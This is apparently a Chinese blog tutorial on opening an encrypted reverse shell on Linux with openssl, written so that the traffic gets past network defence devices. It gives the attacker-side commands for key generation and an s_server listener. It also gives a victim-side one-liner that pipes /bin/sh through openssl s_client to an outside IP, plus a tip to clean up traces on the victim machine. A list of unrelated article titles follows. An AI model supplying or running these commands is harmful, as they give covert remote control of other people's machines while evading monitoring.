0x01 简介

使用常规NC或者其他常规的方法反弹shell,由于流量都是明文的,很容易被网络防御设备检测到,因此需要对传输内容进行混淆或者加密。并且几乎每一个https都有openssl库,方便我们使用openssl反弹shell。下面将在linux下进行演示。

0x02 使用openssl反弹加密shell

**linux **

2.1 生成密钥

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

自生成密钥会提示输入证书信息,如果懒人就可以一路回车。回在本目录下生成文件 key.pem cert.pem

启动监听

openssl s_server -quiet -key key.pem -cert cert.pem -port 23

此时在攻击机23端口上启动了SSL/server服务

2.2 受害主机上反弹加密shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.30.119:23 > /tmp/s; rm /tmp/s



tips:

1.需要注意的是,当攻击机断开连接的时候回在受害主机上提示,需要适当清除。



2.这是非交互式shell,需要提升为交互式shell,后面会补充。

最新文章

  1. Bill的挑战(bzoj 1879)
  2. 一段神奇的代码(python 2.7)网上抓图小Demo
  3. POJ 2352 Stars(树状数组)
  4. oracle 前滚和回滚
  5. iOS图片加载速度极限优化—FastImageCache解析
  6. Sublime text3中配置Github
  7. Ubuntu nginx: [emerg] bind() to 0.0.0.0:80 failed (13: Permission denied)
  8. JSON.stringify语法解析(自己留存)
  9. 格子布局 js
  10. 【初级坑跳跳跳】[NULLException] findViewById() id 引用错误,导致空指针
  11. 算法课上机实验(一个简单的GUI排序算法比较程序)
  12. ORACLE分页SQL语句(转载)
  13. hdu2121 最小树形图的虚根
  14. Flannel网络插件配置
  15. springmvc 对日期的转换与处理
  16. pytorch使用tensorboardX进行loss可视化
  17. ThinkPHP项目笔记之模板篇
  18. 06----fiter
  19. 关于RedHat Enterprise Linux 6.4使用Centos 6 的yum源
  20. 如果想从jenkins直接生成docker镜像,并推送到harbor中,最简单的脚本如何实现?

热门文章

  1. SQL Server 检查和处理死锁问题
  2. STM32------SYSCLK
  3. (转)HDFS简介
  4. (转)Boyer-Moore算法
  5. Runtime.getRuntime.exec()执行linux脚本导致程序卡死有关问题
  6. Log4j的isdebugEnabled的作用
  7. SSH多表操作入门
  8. maven报错Non-resolvable parent POM---pom找不到parent
  9. 题解 SP27102/UVA1747 【Swap Space】
  10. 「题解」「CF1019B」The hat